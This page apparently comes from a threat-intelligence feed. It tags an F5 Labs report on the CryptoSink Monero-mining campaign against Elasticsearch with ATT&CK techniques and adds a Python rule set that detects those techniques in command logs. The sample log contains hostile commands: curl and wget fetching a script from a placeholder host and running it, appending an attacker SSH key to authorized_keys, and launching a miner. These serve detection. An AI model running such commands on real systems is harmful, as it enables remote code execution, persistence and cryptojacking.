TTPwire Vol. 1 · MITRE ATT&CK·Tagged


F5 Labs

“CryptoSink” Campaign Deploys a New Miner Malware

2019-03-13 · Read original ↗

ATT&CK techniques detected

9 predictions

T1105 Ingress Tool Transfer · 73%
"…server by adding the attacker's SSH keys. It uses several command and control (C&C) servers; the current live C&C is located in China. While analyzing the campaign we've named CryptoSink, we encountered a previously unseen method used by attackers to eliminate compet…"

T1059.004 Unix Shell · 72%
"The payload for Linux involves several deployment steps. As in many similar campaigns, it uses the existing curl or wget Linux commands to download and execute a spearhead bash script named ctos.sh. Figure 3. HTTP request delivering the Linux payload. The bash script checks wheth…"

T1496 Resource Hijacking · 68%
"“CryptoSink” Campaign Deploys a New Miner Malware. Recently, threat researchers from F5 Networks spotted a new campaign targeting Elasticsearch systems. It leverages an exploit from 2014 to spread several new malwares designed to deploy an XMR (Monero) mining operation. The …"

T1059.004 Unix Shell · 66%
"Executing the backdoor. The file httpdz is another custom C++ malware implementing a backdoor/trojan functionality. Like the dropper, it tries to connect one of three hardcoded C&C domains and start polling it for commands over a TCP socket. The communication protocol is…"

T1204.002 Malicious File · 64%
"…time of this research). Figure 7. Dropper is not being detected by antivirus solutions (at the time of this research). While retrieving threat intelligence information from VirusTotal for the domain w.3ei.xyz, from which the spearhead script and the dropper were downloaded, w…"

T1496.001 Compute Hijacking · 56%
"“CryptoSink” Campaign Deploys a New Miner Malware. Recently, threat researchers from F5 Networks spotted a new campaign targeting Elasticsearch systems. It leverages an exploit from 2014 to spread several new malwares designed to deploy an XMR (Monero) mining operation. The …"

T1496.001 Compute Hijacking · 35%
"…to use a publicly available pool, which enables us to see the number of mining nodes and the earnings from this campaign using the wallet address. Figure 26. Wallet address is [figure]. Figure 27. The mining revenue for this wallet at the time of this research. An additional wallet ID was f…"

T1059 Command and Scripting Interpreter · 35%
"Executing the backdoor. The file httpdz is another custom C++ malware implementing a backdoor/trojan functionality. Like the dropper, it tries to connect one of three hardcoded C&C domains and start polling it for commands over a TCP socket. The communication protocol is…"

T1098.004 SSH Authorized Keys · 31%
"…C&C traffic of such crypto-miners. Based on a scan from January 29, 2019, the thyrsi.com domain seemed to be hosting a Windows trojan, in the past based on a scan we have found from the 29th of January this year. Figure 14. zer0day.ru subdomains reported observed by VirusTo…"
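The excerpts above describe shell-level behaviour a host-based sensor can see: curl or wget fetching and executing the spearhead script ctos.sh (T1105, T1059.004), the attacker's SSH keys being added to the compromised server (T1098.004), and a miner pointed at a public pool (T1496.001). As an added example that is not part of the original F5 Labs article or of this page's classifier, the following Python applies a small rule set to command lines from an execution log and tags each line with the ATT&CK technique IDs listed above. The log lines, the hostnames (under the reserved .invalid TLD) and the WALLET placeholder are constructed for the example; the regexes are illustrative heuristics rather than F5's detection logic, and the stratum/xmrig indicator is an assumption about common Monero-mining tooling, not something the page states.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Added example: heuristic tagging of executed command lines with the ATT&CK
# techniques listed on this page. Rules are illustrative, not F5's detection logic.


@dataclass(frozen=True)
class Rule:
    technique: str       # ATT&CK technique ID, e.g. "T1105"
    name: str            # technique name as used in the predictions above
    pattern: re.Pattern  # regex applied to the raw command line


RULES: List[Rule] = [
    # T1105: curl/wget pulling content from a remote HTTP(S) URL
    Rule("T1105", "Ingress Tool Transfer",
         re.compile(r"\b(curl|wget)\b\s+.*https?://", re.I)),
    # T1059.004: output piped into a shell, or a fetched .sh script run by sh/bash
    Rule("T1059.004", "Unix Shell",
         re.compile(r"\|\s*(ba)?sh\b|\b(ba)?sh\s+\S+\.sh\b", re.I)),
    # T1098.004: redirecting a key into an authorized_keys file (attacker persistence)
    Rule("T1098.004", "SSH Authorized Keys",
         re.compile(r">>?\s*\S*\.ssh/authorized_keys\b")),
    # T1496.001: miner talking to a stratum pool or a well-known miner binary name
    # (assumed indicator of Monero-mining tooling; not stated on the page)
    Rule("T1496.001", "Compute Hijacking",
         re.compile(r"stratum\+tcp://|\bxmrig\b", re.I)),
]

# Constructed sample of an execution log (one command line per entry). The
# hostnames use the reserved .invalid TLD and WALLET is a placeholder.
SAMPLE_LOG: List[str] = [
    "curl -fsSL http://dl.example.invalid/ctos.sh | bash",
    "wget -qO /tmp/ctos.sh http://dl.example.invalid/ctos.sh && bash /tmp/ctos.sh",
    "echo 'ssh-rsa AAAA...constructed... attacker' >> /root/.ssh/authorized_keys",
    "/tmp/xmrig -o stratum+tcp://pool.example.invalid:3333 -u WALLET",
    "ls -la /var/log",
]


def tag_command(cmd: str) -> List[str]:
    """Return the technique IDs whose rule matches this command line, in rule order."""
    return [r.technique for r in RULES if r.pattern.search(cmd)]


def tag_log(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Tag every command line; untagged lines are kept with an empty list."""
    return [(line, tag_command(line)) for line in lines]


def technique_counts(lines: List[str]) -> Dict[str, int]:
    """Count how often each technique is observed across the whole log."""
    counts: Counter = Counter()
    for _, techniques in tag_log(lines):
        counts.update(techniques)
    return dict(counts)


if __name__ == "__main__":
    for line, techniques in tag_log(SAMPLE_LOG):
        print(f"{techniques or ['-']}\t{line}")
    print(technique_counts(SAMPLE_LOG))
```

Run stand-alone it prints each sample line with its tags; the first two lines match both T1105 and T1059.004 (download plus execution), the authorized_keys append matches only T1098.004, and the miner launch only T1496.001. The rules are deliberately narrow so that they do not fire on an ordinary `ls`; in production they would be one input to a scoring step rather than a verdict on their own.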

Summary

Attackers continue to exploit old vulnerabilities (here a 2014 Elasticsearch exploit), use new methods to kill competing crypto-miners, and survive removal by administrators by planting their own SSH keys and a backdoor that polls C&C for commands.